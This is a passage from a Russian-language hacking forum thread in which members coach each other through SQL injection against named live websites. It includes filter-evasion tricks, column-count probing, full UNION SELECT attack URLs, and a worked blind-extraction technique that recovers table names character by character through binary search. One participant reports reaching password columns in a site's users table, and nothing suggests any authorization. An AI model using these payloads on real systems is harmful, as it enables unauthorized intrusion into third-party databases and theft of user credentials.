Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Попробуй поменять регистр.
    Ну или /*!union*/ :cool:
     
  2. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!
    Произвел sql inj.
    Есть таблица users в ней вся регистрационная информация о пользователях+(столб с названием pass). У всех пользователей в ячейках pass пусто.
    Что делать?
    Доступ к information schema закрыт.(Load_FILE тоже не работает).
    версия мускула 4.1.22-standard
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    У 4 ветки information_schema нет
     
  4. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ясно.
    Как быть?
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    менял,бестолку:(
     
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Крути как blind

    http://forum.antichat.ru/thread19844.html
     
  7. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Выложи сайт, посмотрим.
     
  8. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Спасибо! Пробовал,не получается.
    Все поля кроме pass отображаются.
     
  9. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Всё Всем Спасибо!
    Вопрос снят в таблице два столбца с паролями!=)

    FlaktW +1 от меня=)
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Разъяснить, как вы подобрали количество полей
    +orde+by+3 +--+
    +group+by+3+--+
    не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.


    В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.

    Ааа, ну ок. Вопросов больше не имею.
     
    #16911 Tigger, 4 Jun 2011
    Last edited: 5 Jun 2011
    2 people like this.
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как такие скули, находятся. Запросы типа
    http://www.shoptop.ru/sitemap.html?lim1=8252-1
    http://www.shoptop.ru/sitemap.html?lim1=8252 and 1=0
    http://www.shoptop.ru/sitemap.html?lim1=8252 and true=false
    http://www.shoptop.ru/sitemap.html?lim1=8252*1
    на нее не указывают
    Проги Acunetix Web Vulnerability Scanner, WebCruiser ее не находят
     
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Тут сразу видно, что используется limit, поэтому его дописываем, подбираем кол во полей вручную и комментарий.
    Знаю, так немного удобнее для меня.
     
    #16913 randman, 4 Jun 2011
    Last edited: 4 Jun 2011
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    В этом посте явно видно, что использовалось какая-то программа, которая и указала на SQL-inj
     
    #16914 FlaktW, 4 Jun 2011
    Last edited: 4 Jun 2011
  15. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Code:
    divantvplus.ru/index.html?id=390%20and%201=2+union+select+1,2,3,4,5,6,7,8,9,10,11--+
    
    Не могу разобрать почему отображается так?!
     
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Потому что значение поля 6 используется скриптом для вывода данных.
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x35,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x36,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x31,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x30,1,1,1,1,1--+

    Имеем 4 различных состояния. При использовании бинарного поиска на один символ максимум 4 запроса.
     
    #16916 M_script, 5 Jun 2011
    Last edited: 5 Jun 2011
    1 person likes this.
  17. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Cпасибо! Первый раз с подобным встречаюсь. Что дальше? Можно прямо ссылкой на фак.
     
    #16917 ReV0LVeR, 5 Jun 2011
    Last edited: 5 Jun 2011
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'"

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (64;128]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (80;96]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (84;88]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+
    Возвращает страницу 6. Код символа равен 85
     
    1 person likes this.
  19. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Объясни мне детально вот эту часть запроса:
    Code:
    ,1,1))))>128,if(@x>196,0,1),if(@x>64,5,6))
    
    Посимвольно)
    Cпасибо.
     
  20. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    не уложилось в голове...
    Давай примером , как мне оттуда достать второй символ?



    ,1,1(Почему 1,1 какой в этом смысловой нагруз?)))))>128(почму именно 128?),if(@x>196(Почему именно со 196 сравнение?),0,1(почему 0,1?)),if(@x>64,5,6(Тут тоже не понятно откудо взялось 64, что такое 5,6)))
     
    #16920 ReV0LVeR, 5 Jun 2011
    Last edited: 5 Jun 2011
Thread Status:
Not open for further replies.